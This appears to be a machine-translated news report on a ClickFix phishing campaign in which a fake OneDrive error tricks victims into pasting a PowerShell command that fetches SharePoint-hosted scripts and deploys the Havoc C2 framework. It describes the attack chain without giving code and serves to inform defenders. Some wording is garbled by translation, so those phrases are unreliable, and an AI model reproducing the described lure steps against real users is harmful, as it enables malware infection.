- Security researchers have spotted a new clickfix campaign
- The objective is to deploy the Havoc post-exploitation framework
- The frame is hosted on a Microsoft SharePoint account
Pirates have been seen abusing Microsoft SharePoint to distribute the HAVOC post-exploitation framework in a new Phishing Clickfix attack.
Researchers in Fortiguard Labs cybersecurity, who have been following the campaign since last year, stressed how Clickfix is a type of scam that we have probably all met at least. Cybercriminals would divert a website and create a superposition that displays a false error message (for example: “Your browser is exceeded and to display the content of the web page, you must update it”). This false message would encourage the victim to action, which generally ends by downloading and executing malware, or by sharing sensitive information such as passwords or banking data.
This campaign is similar, although a little more activity requires on the victim’s side. The attack chain begins with a phishing email, carrying a “restricted opinion” as an attachment .html. The execution of the attachment displays a false error which indicates “failure of the connection to OneDrive – update the DNS cache manually”. The page also has a “how to correct” button which copies a PowerShell command in the Windows clip, then displays a message on how to stick and execute it.
Increasing threat of clickfix
The execution of this script then performs a second, hosted on the SharePoint server of the attackers who, in turn, downloads a Python script which deploys the Havoc post-exploitation frame as a .DLL file.
Havoc is a post-exploitation framework designed for an advanced red team and an opponent simulation, providing modular capacities for stealth control and control operations (C2). It offers features such as memory execution, encrypted communication and escape techniques to bypass modern security defenses.
Clickfix has become incredibly popular in recent months. At the end of October of last year, a new variant of malicious software was observed compromising thousands of WordPress websites, installing a malicious plugin which would serve the attack on Clickfix.
A few weeks earlier, the researchers saw false google dating calls, which was also a variant of the clickfix attack.
Via Bleeping Compompute
